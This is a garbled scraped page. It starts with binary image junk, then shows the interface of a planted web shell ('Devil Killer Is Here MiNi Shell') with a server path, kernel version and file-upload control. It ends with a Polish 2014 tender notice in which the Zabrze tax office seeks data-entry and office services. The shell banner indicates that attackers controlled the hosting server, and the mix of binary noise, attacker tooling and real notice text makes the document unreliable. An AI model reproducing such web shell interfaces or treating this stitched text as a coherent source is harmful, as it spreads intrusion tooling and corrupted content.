JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141215/409268-N-2014.html

<p class="kh_header"><b>Zabrze: Wprowadzanie danych do systemów komputerowych 
oraz dodatkowe usługi biurowe</b><br>
<b>Numer ogłoszenia: 409268 - 2014; data zamieszczenia: 15.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Zabrzu , ul. Bytomska 2, 41-800 Zabrze, woj. śląskie, tel. 032 2777699, faks 032 2777666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.isnet.katowice.pl/us/zabrze.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wprowadzanie danych do systemów komputerowych 
oraz dodatkowe usługi biurowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia został podzielony na 27 części i obejmuje niżej wymienione zadania:
Zadanie nr 1 obejmuje 11 części.
Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 2 obejmuje 6 części:
Zadanie obejmuje wprowadzanie danych do bazy POLTAX (PIT -37 wraz z załącznikami) 3200 szt. deklaracji.
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
 wprowadzanie danych zawartych w zeznaniach rocznych;
 zatwierdzanie deklaracji ze statusem prawidłowy;
 wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek ;
 obsługa dokumentów w systemach informatycznych: POLTAX;
 przekazanie zatwierdzonych paczek do Kierownika komórki lub wyznaczonego pracownika w celu wykonania rejestrów przypisów/odpisów.
Znajomość obsługi programu:  POLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 marca 2015r. do 15 maja 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 3 obejmuje 6 części:
Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX (PIT-11, PIT-8C) 4000 szt. deklaracji.
Czynności do wykonania w zadaniu:
 utworzenie paczki
 wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX, sprawdzenie poprawności, zatwierdzenie dokumentu,
 przekazywanie paczek do archiwum urzędu,
Znajomość obsługi programu:  POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych sześciu Wykonawców.
Termin realizacji zadania od 15 stycznia 2015r. do 28 lutego 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 4 obejmuje 1 część:
Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe tj.:
 przygotowywanie korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonywanie czynności nadawczych (20 poz. na h), 
 poszukiwanie i analiza informacji będących w posiadaniu urzędu nt posiadanego majątku zobowiązanych oraz poszukiwanie majątku w innych instytucjach (przygotowywanie zapytań) (5 podmiotów na h), 
 kompletowanie i archiwizacja akt (30 dokumentów na h) 
 wprowadzanie danych do systemu, w tym obsługa aplikacji POLTAX (35 nr systemowych na h) 
 odnotowywanie w systemie informacji o doręczeniu (70szt/h)  
 kompletowanie i przygotowywanie akt przesłanych do innych organów ( 40 dokumentów na h)
 kompletowanie akt bieżących (20 dokumentów na h)
Znajomość obsługi programu:  EGAPOLTAX, POLTAX,  BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 720 godzin.
Termin realizacji zadania od 09 lutego 2015r. do 17 czerwca 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 5 obejmuje 1 część:
Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na realizacji zajęć wierzytelności.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Znajomość obsługi programu:  POLTAX 2B, BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 1111 godzin.
Termin realizacji zadania od 19 stycznia 2015r. do 30 sierpnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 6 obejmuje 1 część:
Zadanie obejmuje wprowadzanie danych do bazy POLTAX 2B:
Czynności do wykonania w zadaniu:
 Księgowanie i dokonywanie zwrotów nadpłat z zeznań rocznych PIT-37 za 2014 rok, 
 Realizacja zajęć egzekucyjnych, komorniczych i innych w powyższym zakresie,
 Zaliczanie nadpłat na poczet zaległości podatkowych jak i bieżących i przyszłych zobowiązań podatkowych.
Łączna ilość zwrotów do zaksięgowania: 10.000 sztuk.
Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na: 
 Wprowadzaniu zajęć wierzytelności do systemu Biblioteka Akt ( ok.50 szt. na h ),
 Przekazywanie wprowadzanych dokumentów wraz z wydrukami do komórki RP I,
 Wysyłka błędnie przysłanych zajęć wierzytelności do innych urzędów. 
Znajomość obsługi programu:   BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca. 
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 500 godzin.
Termin realizacji zadania od 02 lutego 2015r. do 30 kwietnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 7 obejmuje 1 część:
Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe polegające na: 
 Wprowadzaniu zajęć wierzytelności do systemu Biblioteka Akt ( ok.50 szt. na h ),
 Przekazywanie wprowadzanych dokumentów wraz z wydrukami do komórki RP I,
 Wysyłka błędnie przysłanych zajęć wierzytelności do innych urzędów. 
Znajomość obsługi programu:   BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybrany jeden Wykonawca. 
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na Wykonawcę zostało przewidziane 500 godzin.
Termin realizacji zadania od 02 lutego 2015r. do 30 kwietnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 75.90.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 27.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 12.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków
udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków
udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli w dniu składania oferty osoby będą miały ukończone 18 lat i ukończoną szkołę średnią- należy wypełnić oświadczenie Załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli w dniu składania oferty osoby będą miały ukończone 18 lat i ukończoną szkołę średnią- należy wypełnić oświadczenie Załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków
udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - znajomość programów - 0.05</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.isnet.katowice.pl/us/zabrze.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Zabrzu
ul. Bytomska 2
41-800 Zabrze
pok. 510.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2014 godzina 15:00, miejsce: Urząd Skarbowy w Zabrzu
ul. Bytomska 2
41-800 Zabrze
pok. 510.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
Znajomość obsługi programu:  EGAPOLTAX, SUMY  DEPOZYTOWE; BIBLIOTEKA  AKT.
Jedna część równa się jeden Wykonawca, w tym zadaniu zostanie wybranych jedenastu Wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 9,00 złotych brutto za jedną godzinę.
Na każdego Wykonawcę zostało przewidziane 1952 godziny.
Termin realizacji zadania od 12 stycznia 2015r. do 18 grudnia 2015r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 12.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. znajomość programów - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wprowadzanie danych do systemu komputerowego oraz usługi biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do systemu komputerowego oraz usługi biurowe w następującym zakresie:
Obsługa tytułów wykonawczych ( również w przypadku zbiegu egzekucji ) w szczególności: 
 kompletowanie TW na rejonach (40 szt. na h),  w tym oznaczanie tytułów kodami kreskowymi,    
wprowadzanie danych do systemu, informacje o dacie wszczęcia postępowania i zastosowania środka egzekucyjnego w aplikacji EGAPOLTAX (15 szt. na h), 
odnotowanie w EGAPLTAX informacji o dokonanych czynnościach np. zastosowane środki, umorzenie postępowania (70 szt. na h),
wprowadzanie tytułów wykonawczych i innych dokumentów związanych z egzekucją (35 szt. na h),
w zakresie wprowadzania danych do systemu: obsługa programu  SUMY DEPOZYTOWE  tj. codzienne ściąganie wyciągów bankowych i drukowanie przelewów w programie Sumy Depozytowe, pobieranie z dysku K przelewów wygenerowanych przez poszczególnych pracowników i przenoszenie plików do programu Sumy Depozytowe- folder przelewy; kompletne uzgadnianie w programie Sumy Depozytowe przelewów wychodzących; przekazywanie wydruków do Działu Rachunkowości Budżetowej; przygotowywanie danych statystycznych i analitycznych na potrzeby Egzekucji Administracyjnej (480h)
Obsługa korespondencji przychodzącej i wychodzącej dotyczącej działu egzekucji administracyjnej,
Archiwizacja dokumentów związana z egzekucją należności.  
